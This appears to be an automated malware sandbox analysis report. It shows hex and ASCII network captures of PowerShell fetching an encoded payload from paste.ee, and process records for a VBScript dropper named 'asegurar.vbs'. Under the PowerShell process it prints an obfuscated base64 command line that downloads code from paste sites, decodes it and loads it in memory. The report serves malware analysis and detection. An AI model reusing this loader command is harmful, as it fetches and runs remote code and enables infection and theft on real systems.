                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 93 94 e2 93 94 55 55 42 61 4f 67 64 42 59 4d e2 93 94 e2 93 94 e2 93 94 44 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 43 56 51 6a 44 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 47 44 77 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 51 51 46 51 34 e2 93 94 e2 93 94 e2 93 94 46 47 67 78 e2 93 94 e2 93 94 e2 93 94 4d e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2
                                                                                              Data Ascii: UUBaOgdBYMDCVQjDYGDwQQFQ4FGgxM
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 93 94 e2 93 94 59 77 43 76 58 67 34 e2 93 94 e2 93 94 e2 93 94 59 77 45 31 4f 51 4d e2 93 94 e2 93 94 e2 93 94 59 77 45 31 47 68 7a e2 93 94 e2 93 94 e2 93 94 59 77 45 31 2b 51 4b e2 93 94 e2 93 94 e2 93 94 59 77 43 76 33 e2 93 94 e2 93 94 e2 93 94 38 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 2f 77 64 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 2f 51 57 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 4c 68 5a e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 37 77 54 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 37 67 57 e2 93 94 e2 93 94 e2 93 94 59 77 45 31 75 e2 93 94 e2 93 94 e2 93 94 55 e2 93 94 e2 93 94 e2 93 94 59 e2 93 94 e2 93 94 e2 93 94 44 37 37 e2 93 94 e2 93
                                                                                              Data Ascii: YwCvXg4YwE1OQMYwE1GhzYwE1+QKYwCv38YD7/wdYD7/QWYD7LhZYD77wTYD77gWYwE1uUYD77
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 72 51 77 45 58 73 69 4d 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 64 76 6e e2 93 94 e2 93 94 e2 93 94 46 51 2b 4b 45 4d 68 46 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 34 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 77 43 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 77 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 46 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 51 51 52 45 45 78 46 72 51 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2
                                                                                              Data Ascii: rQwEXsiMEdvnFQ+KEMhF4wCwEFQQREExFrQ
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 93 94 e2 93 94 e2 93 94 44 42 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 6f 48 e2 93 94 e2 93 94 e2 93 94 46 e2 93 94 e2 93 94 e2 93 94 7a 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 67 4b 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 33 58 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 42 4e 43 78 48 43 6f e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 38 e2 93 94 e2 93 94 e2 93 94 4b 43 49 6c 4b 55 4f e2 93 94 e2 93 94 e2 93 94 42 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 77 37 4a 67 4a 71 51 e2 93 94 e2 93
                                                                                              Data Ascii: DBoHFzEgKE3XBNCxHCo8KCIlKUOBw7JgJqQ


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449736188.114.97.3443980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-31 06:41:18 UTC67OUTGET /d/Rrk2f/0 HTTP/1.1
                                                                                              Host: paste.ee
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-31 06:41:19 UTC1232INHTTP/1.1 200 OK
                                                                                              Date: Thu, 31 Oct 2024 06:41:19 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=2592000
                                                                                              strict-transport-security: max-age=63072000
                                                                                              x-frame-options: DENY
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1; mode=block
                                                                                              content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DZKapLqnpI4OWlHgJn7lKhzhXRQyP5AtnIBZEKoV%2BPdwtXU3HM9RoeaQf1V%2FwO2tlJzkbw%2F8AqBHvjCySJWJGgoA0EgKZh1LakwxerN86rDtTkzOjl1ZnT2KUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8db1a89d2d083ab6-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-10-31 06:41:19 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 31 39 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 35 33 31 34 36 38 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 34 31 30 63 63 30 34 37 34 37 39 31 32 31 37 62 26 74 73 3d 33 31 35 26 78 3d 30 22 0d 0a 0d 0a
                                                                                              Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=2531468&cwnd=251&unsent_bytes=0&cid=410cc0474791217b&ts=315&x=0"
                                                                                              2024-10-31 06:41:19 UTC1316INData Raw: 31 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78
                                                                                              Data Ascii: 1f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDex
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 44 4f 34 51 78 4e 38 66 44 2b 33 67 2b 4e 51 66 44 6d 33 67 34 4e 73 64 44 61 33 67 30 4e 45 64 44 51 33 77 44 41 41 41 41 4d 41 59 41 6b 41 59 44 51 32 77 54 4e 41 58 44 76 31 67 62 4e 30 57 44 73 31 77 61 4e 6f 57 44 6e 31 67 5a 4e 55 57 44 6b 31 77 59 4e 49 57 44 68 31 41 59 4e 38 56 44 65 31 51 58 4e 77 56 44 62 31 67 57 4e 6b 56 44 59 31 77 56 4e 59 56 44 56 31 41 56 4e 4d 56 44 53 31 51 55 4e 41 56 44 50 31 67 54 4e 30 55 44 4d 31 77 53 4e 6f 55 44 4a 31 41 53 4e 63 55 44 47 31 51 52 4e 51 55 44 44 31 67 51 4e 45 55 44 41 30 77 50 4e 34 54 44 39 30 41 50 4e 73 54 44 36 30 51 4f 4e 67 54 44 33 30 67 4e 4e 55 44 41 41 41 41 49 41 47 41 48 41 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77
                                                                                              Data Ascii: DO4QxN8fD+3g+NQfDm3g4NsdDa3g0NEdDQ3wDAAAAMAYAkAYDQ2wTNAXDv1gbN0WDs1waNoWDn1gZNUWDk1wYNIWDh1AYN8VDe1QXNwVDb1gWNkVDY1wVNYVDV1AVNMVDS1QUNAVDP1gTN0UDM1wSNoUDJ1ASNcUDG1QRNQUDD1gQNEUDA0wPN4TD90APNsTD60QONgTD30gNNUDAAAAIAGAHAzg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMw
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 54 32 51 6b 4e 38 59 44 4e 32 77 69 4e 6b 59 44 48 32 51 68 4e 4d 59 44 42 31 77 66 4e 30 58 44 37 31 51 65 4e 63 58 44 31 31 77 63 4e 45 58 44 76 31 51 62 4e 73 57 44 70 31 77 5a 4e 55 57 44 6a 31 51 59 4e 38 56 44 64 31 77 57 4e 6b 56 44 42 30 77 50 4e 30 54 44 37 30 51 4f 4e 63 54 44 31 30 77 4d 4e 45 54 44 76 30 51 4c 4e 73 53 44 70 30 77 4a 4e 55 53 44 6a 30 51 49 4e 38 52 44 64 30 77 47 4e 6b 52 44 58 30 51 46 4e 4d 52 44 52 30 77 44 4e 30 51 44 4c 30 51 79 4d 49 4e 44 50 7a 41 7a 4d 6b 4d 44 47 7a 77 77 4d 41 49 44 39 79 67 75 4d 63 4c 44 30 79 51 73 4d 34 4b 44 72 79 41 71 4d 55 4b 44 69 79 77 6e 4d 77 4a 44 5a 79 67 6c 4d 4d 4a 44 51 79 41 6a 4d 6b 49 44 47 79 77 67 4d 41 45 44 39 78 67 65 4d 63 48 44 30 78 51 63 4d 34 47 44 72 78 41 61 4d 55 47
                                                                                              Data Ascii: T2QkN8YDN2wiNkYDH2QhNMYDB1wfN0XD71QeNcXD11wcNEXDv1QbNsWDp1wZNUWDj1QYN8VDd1wWNkVDB0wPN0TD70QONcTD10wMNETDv0QLNsSDp0wJNUSDj0QIN8RDd0wGNkRDX0QFNMRDR0wDN0QDL0QyMINDPzAzMkMDGzwwMAID9yguMcLD0yQsM4KDryAqMUKDiywnMwJDZyglMMJDQyAjMkIDGywgMAED9xgeMcHD0xQcM4GDrxAaMUG
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c 44 34 79 67 74 4d 51 4c 44 79 79 41 73 4d 34 4b 44 73 79 67 71 4d 67 4b 44 6d 79 41 70 4d 49 4b 44 67 79 67 6e 4d 77 4a 44 61 79 41 6d 4d 59 4a 44 55 79 67 6b 4d 41 4a 44 4f 79 41 6a 4d 6f 49 44 49 79 67 68 4d 51 49 44 43 79 41 51 4d 34 48 44 38 78 67 65 4d 67 48 44 32 78 41 64 4d 49 48 44 77 78 67 62 4d 77 47 44 71 78 41 61 4d 59 47 44 6b 78 67 59 4d 41 47 44 65 78 41 58 4d 6f 46 44 59 78 67 56 4d 51 46 44 53 78 41 55 4d 34 45 44 4d 78 67 53 4d 67 45 44 47 78 41 52 4d 49 45 44 41 77 67 50 4d 77 44 44 36 77 41 4f 4d 59 44 44 30 77 67 4d 4d 41 44 44 75 77 41 4c 4d 6f 43 44 6f 77 67 4a 4d 51 43 44 69 77 41 49 4d 34 42 44 63 77 67 47 4d 67 42 44
                                                                                              Data Ascii: zA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMoLD4ygtMQLDyyAsM4KDsygqMgKDmyApMIKDgygnMwJDayAmMYJDUygkMAJDOyAjMoIDIyghMQIDCyAQM4HD8xgeMgHD2xAdMIHDwxgbMwGDqxAaMYGDkxgYMAGDexAXMoFDYxgVMQFDSxAUM4EDMxgSMgEDGxARMIEDAwgPMwDD6wAOMYDD0wgMMADDuwALMoCDowgJMQCDiwAIM4BDcwgGMgBD
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 67 34 4e 45 65 44 67 33 77 33 4e 34 64 44 64 33 41 33 4e 73 64 44 61 33 51 32 4e 67 64 44 58 33 67 31 4e 55 64 44 55 33 77 30 4e 49 64 44 52 33 41 30 4e 38 63 44 4f 33 51 7a 4e 77 63 44 4c 33 67 79 4e 6b 63 44 43 33 51 77 4e 41 59 44 37 32 67 75 4e 6b 62 44 34 32 77 74 4e 59 62 44 31 32 41 74 4e 45 5a 44 51 32 77 6a 4e 6f 59 44 4a 32 41 69 4e 63 59 44 47 32 51 68 4e 51 59 44 44 32 41 51 4e 38 58 44 2b 31 51 66 4e 77 58 44 37 31 67 65 4e 6b 58 44 34 31 77 64 4e 59 58 44 31 31 41 64 4e 4d 58 44 79 31 51 63 4e 41 58 44 76 31 67 62 4e 30 57 44 73 31 77 61 4e 6f 57 44 70 31 41 61 4e 63 57 44 6d 31 51 5a 4e 51 57 44 6a 31 67 59 4e 45 57 44 67 31 77 58 4e 34 56 44 64 31 41 58 4e 73 56 44 61 31 51 57 4e 67 56 44 58 31 67 56 4e 55 56 44 55 31 77 55 4e 49 56 44 52
                                                                                              Data Ascii: g4NEeDg3w3N4dDd3A3NsdDa3Q2NgdDX3g1NUdDU3w0NIdDR3A0N8cDO3QzNwcDL3gyNkcDC3QwNAYD72guNkbD42wtNYbD12AtNEZDQ2wjNoYDJ2AiNcYDG2QhNQYDD2AQN8XD+1QfNwXD71geNkXD41wdNYXD11AdNMXDy1QcNAXDv1gbN0WDs1waNoWDp1AaNcWDm1QZNQWDj1gYNEWDg1wXN4VDd1AXNsVDa1QWNgVDX1gVNUVDU1wUNIVDR
                                                                                              2024-10-31 06:41:19 UTC1279INData Raw: 4f 4e 75 53 44 6d 30 59 47 4e 61 52 7a 4b 30 34 78 4d 67 50 7a 76 7a 55 37 4d 69 4f 44 65 7a 38 32 4d 6f 4e 6a 4a 7a 38 68 4d 6c 4c 7a 7a 79 67 72 4d 78 4b 44 69 79 41 6f 4d 6a 4a 54 56 79 59 6b 4d 47 45 44 37 41 41 41 41 34 42 51 42 41 41 41 41 41 38 44 31 2f 59 36 50 35 39 7a 5a 2f 38 30 50 47 35 54 79 2b 49 51 50 72 33 6a 33 39 45 64 50 45 33 7a 67 39 59 58 50 76 31 44 61 39 45 47 50 6b 7a 54 32 38 73 4c 50 55 79 6a 63 38 63 45 50 54 73 7a 37 37 41 2b 4f 57 76 7a 7a 36 49 76 4f 65 69 44 2b 34 49 35 4e 55 66 6a 78 33 4d 37 4e 72 65 54 6e 33 59 31 4e 4a 64 54 4e 33 4d 69 4e 37 61 54 57 31 41 61 4e 59 57 6a 69 31 6b 58 4e 73 56 54 59 31 45 53 4e 4d 51 44 2b 30 77 4f 4e 6a 53 7a 59 30 41 46 4e 75 51 44 43 7a 55 2b 4d 63 4f 7a 6c 7a 45 35 4d 4d 4f 6a 57 7a
                                                                                              Data Ascii: ONuSDm0YGNaRzK04xMgPzvzU7MiODez82MoNjJz8hMlLzzygrMxKDiyAoMjJTVyYkMGED7AAAA4BQBAAAAA8D1/Y6P59zZ/80PG5Ty+IQPr3j39EdPE3zg9YXPv1Da9EGPkzT28sLPUyjc8cEPTsz77A+OWvzz6IvOeiD+4I5NUfjx3M7NreTn3Y1NJdTN3MiN7aTW1AaNYWji1kXNsVTY1ESNMQD+0wONjSzY0AFNuQDCzU+McOzlzE5MMOjWz
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 32 30 30 30 0d 0a 61 78 41 57 4d 38 45 44 4e 77 55 50 4d 74 44 44 72 77 45 4b 4d 4f 42 44 53 41 41 41 41 67 43 41 42 51 43 77 50 68 2f 54 32 2f 73 38 50 44 2f 6a 75 2f 45 37 50 70 2b 54 6f 2f 6b 35 50 4f 2b 44 66 2f 51 33 50 6f 39 44 59 2f 63 31 50 4f 39 6a 52 2f 34 7a 50 32 38 6a 4c 2f 45 79 50 56 38 54 44 2b 38 73 50 6a 36 7a 64 2b 41 6c 50 4b 35 44 52 2b 34 6a 50 32 34 6a 4d 2b 63 69 50 59 34 44 44 39 73 66 50 76 33 54 33 39 6b 62 50 71 32 44 6e 39 6f 58 50 31 31 44 63 39 77 56 50 52 31 44 50 39 38 53 50 6b 77 54 39 38 63 4e 50 53 7a 54 7a 38 49 4d 50 6d 79 6a 67 38 38 45 50 4b 78 54 52 38 6f 44 50 4a 73 54 35 37 41 2b 4f 62 76 44 30 37 51 37 4f 64 75 6a 67 37 30 33 4f 34 74 54 62 37 45 31 4f 42 74 44 49 37 73 78 4f 57 73 7a 43 36 6b 75 4f 58 72 54 75
                                                                                              Data Ascii: 2000axAWM8EDNwUPMtDDrwEKMOBDSAAAAgCABQCwPh/T2/s8PD/ju/E7Pp+To/k5PO+Df/Q3Po9DY/c1PO9jR/4zP28jL/EyPV8TD+8sPj6zd+AlPK5DR+4jP24jM+ciPY4DD9sfPv3T39kbPq2Dn9oXP11Dc9wVPR1DP98SPkwT98cNPSzTz8IMPmyjg88EPKxTR8oDPJsT57A+ObvD07Q7Odujg703O4tTb7E1OBtDI7sxOWszC6kuOXrTu
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 71 4e 69 55 44 32 31 4d 63 4e 70 56 6a 46 30 6b 77 4d 72 4d 44 43 79 67 64 4d 48 44 41 41 41 77 45 41 45 41 43 41 37 4d 47 4f 56 63 44 2b 33 59 36 4e 41 5a 44 4b 31 73 57 4e 79 55 44 44 30 41 39 4d 7a 50 54 41 79 41 74 4d 79 45 54 37 78 6f 62 4d 6f 46 7a 4f 78 34 41 4d 63 42 41 41 41 41 44 41 45 41 42 41 41 41 77 50 6e 2b 7a 64 2b 6b 53 50 69 33 7a 68 39 6b 33 4f 42 70 54 64 35 6b 45 4f 35 69 7a 6b 34 59 33 4e 45 61 6a 6e 32 63 6a 4e 6b 55 54 38 31 45 38 4d 6e 49 6a 35 79 55 73 4d 68 4b 6a 6d 79 55 70 4d 6c 45 54 61 77 6f 4a 41 41 41 41 51 41 51 41 41 41 38 6a 35 2f 45 2b 50 43 37 6a 78 2b 55 71 50 42 36 6a 65 2b 55 6e 50 49 30 44 48 38 77 65 4f 51 6d 6a 68 7a 63 67 4d 67 46 44 4d 78 6f 41 4d 74 44 7a 4e 77 73 42 41 41 41 41 4d 41 4d 41 38 41 41 41 41 2f
                                                                                              Data Ascii: qNiUD21McNpVjF0kwMrMDCygdMHDAAAwEAEACA7MGOVcD+3Y6NAZDK1sWNyUDD0A9MzPTAyAtMyET7xobMoFzOx4AMcBAAAADAEABAAAwPn+zd+kSPi3zh9k3OBpTd5kEO5izk4Y3NEajn2cjNkUT81E8MnIj5yUsMhKjmyUpMlETawoJAAAAQAQAAA8j5/E+PC7jx+UqPB6je+UnPI0DH8weOQmjhzcgMgFDMxoAMtDzNwsBAAAAMAMA8AAAA/
                                                                                              2024-10-31 06:41:19 UTC1369INData Raw: 4d 48 44 54 77 77 77 4c 4d 32 43 44 73 77 6f 4b 4d 6c 43 7a 6e 77 6b 4a 4d 54 43 6a 6a 77 67 49 4d 43 43 44 66 77 63 48 4d 78 42 7a 61 77 55 47 4d 67 42 6a 57 77 4d 46 4d 4f 42 54 53 77 4d 45 4d 39 41 7a 4e 77 49 44 4d 73 41 6a 4a 77 41 43 4d 62 41 54 46 77 38 41 4d 4a 41 44 42 41 41 51 41 49 42 77 41 67 42 41 41 41 38 6a 2f 2f 67 2f 50 79 2f 54 37 2f 63 2b 50 68 2f 7a 32 2f 59 39 50 51 2f 6a 79 2f 51 38 50 2f 2b 54 75 2f 4d 37 50 74 2b 44 71 2f 49 36 50 63 2b 6a 6c 2f 45 35 50 4c 2b 54 68 2f 38 33 50 36 39 44 64 2f 34 32 50 6f 39 7a 59 2f 30 31 50 58 39 54 55 2f 77 30 50 47 39 44 51 2f 6f 7a 50 31 38 7a 4c 2f 6b 79 50 6a 38 6a 48 2f 67 78 50 53 38 44 44 2f 63 77 50 42 34 6a 2b 2b 4d 76 50 74 37 44 69 39 45 61 50 56 77 54 30 38 51 4d 50 39 79 7a 74 38 45
                                                                                              Data Ascii: MHDTwwwLM2CDswoKMlCznwkJMTCjjwgIMCCDfwcHMxBzawUGMgBjWwMFMOBTSwMEM9AzNwIDMsAjJwACMbATFw8AMJADBAAQAIBwAgBAAA8j//g/Py/T7/c+Ph/z2/Y9PQ/jy/Q8P/+Tu/M7Pt+Dq/I6Pc+jl/E5PL+Th/83P69Dd/42Po9zY/01PX9TU/w0PG9DQ/ozP18zL/kyPj8jH/gxPS8DD/cwPB4j++MvPt7Di9EaPVwT08QMP9yzt8E


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:02:41:00
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
                                                                                              Imagebase:0x7ff697930000
                                                                                              File size:170'496 bytes
                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:02:41:01
                                                                                              Start date:31/10/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?C